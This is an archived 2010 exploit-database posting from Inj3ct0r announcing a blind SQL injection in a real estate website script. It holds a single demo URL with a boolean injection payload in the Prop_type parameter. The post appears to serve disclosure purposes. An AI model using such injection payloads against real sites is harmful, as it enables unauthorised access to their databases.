Real Estate Script Blind SQL Injection Vulnerability
Posted on 09 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Real Estate Script Blind SQL Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==================================================== Real Estate Script Blind SQL Injection Vulnerability ==================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ################################### 1 0 I'm SONiC member from Inj3ct0r Team 1 1 ################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Critical Level :VERY HIGH vendor URL : http://www.benivolent.com/ ####################################################################################################### Author : ..::[ SONiC ]::.. aka ~the_pshyco~ <sonicdefence[at]gmail.com> Special thanks to : Sid3^effects,r0073r (inj3ct0r.com),L0rd CruSad3r,M4n0j,Bunny,Nishi,MA1201,RJ,D3aD F0x, www.topsecure.net ,All ICW members , iNj3cT0r.com, www.andhrahackers.com Special Shoutz : H***** [my Girl Frnd] [Elite .NET Programmer] ####################################################################################################### Description: Benivolent Soft Tech providing web-based Real Estate software package which contains fast and efficiency search options. If you are looking to run a Real estate website, our script is a great solution for you. Our Real Estate script helps you to create your own real estate website at affordable rate within the limited time period and within the limited man power. ####################################################################################################### eXploit :Blind SQl iNj3cTi0N Vulnerabilty DEMO URL http://www.benivolent.com/Demo_Realestate_Script/newresidential.php?Prop_type=%27Residential%20Apartment%27%20AND%201=1 ############################################################################################################### # ..::[ SONiC ]::.. aka the_pshyco # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-09]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
